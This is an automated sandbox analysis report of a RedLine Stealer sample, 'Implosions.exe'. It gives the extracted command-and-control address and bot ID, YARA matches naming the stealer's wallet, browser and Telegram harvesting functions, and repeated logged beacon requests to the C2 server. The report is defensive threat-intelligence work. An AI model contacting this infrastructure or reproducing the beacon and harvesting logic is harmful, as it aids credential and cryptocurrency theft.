Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Implosions.exe

Overview

General Information

Sample name:Implosions.exe
Analysis ID:1505369
MD5:aeed85e8a5b1d2013ea6fa0348e954d7
SHA1:899fc5632fce363d0dd1f05bb388f0f3f27240c2
SHA256:5b1d458a558dbe702742407f213b8a38241555bbded345b0f7c46529b938b3a3
Tags:exeredlinestealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Implosions.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Implosions.exe" MD5: AEED85E8A5B1D2013EA6FA0348E954D7)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["109.234.38.212:6677"], "Bot Id": "russianhack"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Implosions.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 02 88 44 24 2B 88 44 24 2F B0 BB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x126f7:$a4: get_ScannedWallets
      • 0x121a0:$a5: get_ScanTelegram
      • 0x122b6:$a6: get_ScanGeckoBrowsersPaths
      • 0x12402:$a7: <Processes>k__BackingField
      • 0x117ae:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x11f9f:$a9: <ScanFTP>k__BackingField
      00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x11f45:$u7: RunPE
      • 0x11f4b:$u8: DownloadAndEx
      • 0x189d8:$pat14: , CommandLine:
      • 0x116cb:$v2_1: ListOfProcesses
      • 0x1210c:$v2_2: get_ScanBrowsers
      • 0x1214a:$v2_2: get_ScanFTP
      • 0x12162:$v2_2: get_ScanWallets
      • 0x12182:$v2_2: get_ScanScreen
      • 0x121a0:$v2_2: get_ScanTelegram
      • 0x121c2:$v2_2: get_ScanVPN
      • 0x121da:$v2_2: get_ScanSteam
      • 0x121f6:$v2_2: get_ScanDiscord
      • 0x1227e:$v2_2: get_ScanChromeBrowsersPaths
      • 0x122b6:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x126f7:$v2_2: get_ScannedWallets
      • 0x119e4:$v2_3: GetArguments
      • 0x11a0e:$v2_4: VerifyUpdate
      • 0x119f1:$v2_5: VerifyScanRequest
      • 0x11a03:$v2_6: GetUpdates
      • 0x1713b:$v2_6: GetUpdates
      • 0x10093:$v4_3: base64str
      00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.Implosions.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 02 88 44 24 2B 88 44 24 2F B0 BB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        0.2.Implosions.exe.34e0190.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Implosions.exe.34e0190.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0.2.Implosions.exe.34e0190.6.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x108f7:$a4: get_ScannedWallets
            • 0x103a0:$a5: get_ScanTelegram
            • 0x104b6:$a6: get_ScanGeckoBrowsersPaths
            • 0x10602:$a7: <Processes>k__BackingField
            • 0xf9ae:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1019f:$a9: <ScanFTP>k__BackingField
            0.2.Implosions.exe.34e0190.6.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x10145:$u7: RunPE
            • 0x1014b:$u8: DownloadAndEx
            • 0x16bd8:$pat14: , CommandLine:
            • 0xf8cb:$v2_1: ListOfProcesses
            • 0x1030c:$v2_2: get_ScanBrowsers
            • 0x1034a:$v2_2: get_ScanFTP
            • 0x10362:$v2_2: get_ScanWallets
            • 0x10382:$v2_2: get_ScanScreen
            • 0x103a0:$v2_2: get_ScanTelegram
            • 0x103c2:$v2_2: get_ScanVPN
            • 0x103da:$v2_2: get_ScanSteam
            • 0x103f6:$v2_2: get_ScanDiscord
            • 0x1047e:$v2_2: get_ScanChromeBrowsersPaths
            • 0x104b6:$v2_2: get_ScanGeckoBrowsersPaths
            • 0x108f7:$v2_2: get_ScannedWallets
            • 0xfbe4:$v2_3: GetArguments
            • 0xfc0e:$v2_4: VerifyUpdate
            • 0xfbf1:$v2_5: VerifyScanRequest
            • 0xfc03:$v2_6: GetUpdates
            • 0x1533b:$v2_6: GetUpdates
            • 0xe293:$v4_3: base64str
            Click to see the 69 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-06T06:37:01.472489+020028496621Malware Command and Control Activity Detected192.168.2.449730109.234.38.2126677TCP
            2024-09-06T06:37:08.171917+020028496621Malware Command and Control Activity Detected192.168.2.449731109.234.38.2126677TCP
            2024-09-06T06:37:14.780061+020028496621Malware Command and Control Activity Detected192.168.2.449732109.234.38.2126677TCP
            2024-09-06T06:37:21.407768+020028496621Malware Command and Control Activity Detected192.168.2.449739109.234.38.2126677TCP
            2024-09-06T06:37:28.035446+020028496621Malware Command and Control Activity Detected192.168.2.449740109.234.38.2126677TCP
            2024-09-06T06:37:34.676824+020028496621Malware Command and Control Activity Detected192.168.2.449741109.234.38.2126677TCP
            2024-09-06T06:37:41.518633+020028496621Malware Command and Control Activity Detected192.168.2.449742109.234.38.2126677TCP
            2024-09-06T06:37:48.122852+020028496621Malware Command and Control Activity Detected192.168.2.449743109.234.38.2126677TCP
            2024-09-06T06:37:54.780880+020028496621Malware Command and Control Activity Detected192.168.2.449745109.234.38.2126677TCP
            2024-09-06T06:38:01.423282+020028496621Malware Command and Control Activity Detected192.168.2.449746109.234.38.2126677TCP
            2024-09-06T06:38:09.056633+020028496621Malware Command and Control Activity Detected192.168.2.449747109.234.38.2126677TCP
            2024-09-06T06:38:15.668068+020028496621Malware Command and Control Activity Detected192.168.2.449748109.234.38.2126677TCP
            2024-09-06T06:38:22.284052+020028496621Malware Command and Control Activity Detected192.168.2.449749109.234.38.2126677TCP
            2024-09-06T06:38:28.887423+020028496621Malware Command and Control Activity Detected192.168.2.449750109.234.38.2126677TCP
            2024-09-06T06:38:35.564617+020028496621Malware Command and Control Activity Detected192.168.2.449751109.234.38.2126677TCP
            2024-09-06T06:38:42.187989+020028496621Malware Command and Control Activity Detected192.168.2.449752109.234.38.2126677TCP
            2024-09-06T06:38:48.816093+020028496621Malware Command and Control Activity Detected192.168.2.449753109.234.38.2126677TCP
            2024-09-06T06:38:55.520218+020028496621Malware Command and Control Activity Detected192.168.2.449754109.234.38.2126677TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Implosions.exeAvira: detected
            Found malware configuration
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["109.234.38.212:6677"], "Bot Id": "russianhack"}
            Multi AV Scanner detection for submitted file
            Source: Implosions.exeReversingLabs: Detection: 71%
            Source: Implosions.exeVirustotal: Detection: 53%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Implosions.exeJoe Sandbox ML: detected
            Source: Implosions.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000074B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: o.pdbService source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbys source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.0000000000705000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000077D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdbUN source: Implosions.exe, 00000000.00000002.2911841113.0000000005BD2000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49743 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49742 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49732 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49731 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49739 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49748 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49741 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49746 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49750 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49745 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49752 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49749 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49753 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49754 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49747 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49740 -> 109.234.38.212:6677
            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49751 -> 109.234.38.212:6677
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 109.234.38.212:6677
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 6677
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 109.234.38.212:6677
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownTCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 109.234.38.212:6677Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.234.38.212:6677
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.234.38.212:6677/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
